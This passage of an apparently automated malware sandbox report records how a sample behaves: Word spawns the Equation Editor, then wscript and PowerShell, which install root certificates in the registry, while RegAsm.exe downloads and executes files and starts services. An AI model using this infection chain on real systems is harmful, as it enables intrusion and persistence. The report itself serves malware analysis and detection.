'desativado','RegAsm',''))"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_002CF724 push 0000005Ch; retf 1_2_002CF72F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_002E3C3A push esi; ret 1_2_002E3C3B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_002D8F60 push eax; retf 1_2_002D8F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_002E3C42 push esi; ret 1_2_002E3C43
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_002E41EE push ebp; ret 1_2_002E41EF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_002E41E6 push ebp; ret 1_2_002E41E7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_002D01F4 push eax; retf 1_2_002D01F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_002E15F5 pushfd ; ret 1_2_002E15FD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00252D88 pushad ; ret 7_2_00252D91
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00252D98 pushfd ; ret 7_2_00252DA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00457186 push ecx; ret 8_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045E55D push esi; ret 8_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00457AA8 push eax; ret 8_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434EB6 push ecx; ret 8_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10002806 push ecx; ret 8_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00451D34 push eax; ret 12_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00406EEB ShellExecuteW,URLDownloadToFileW,8_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
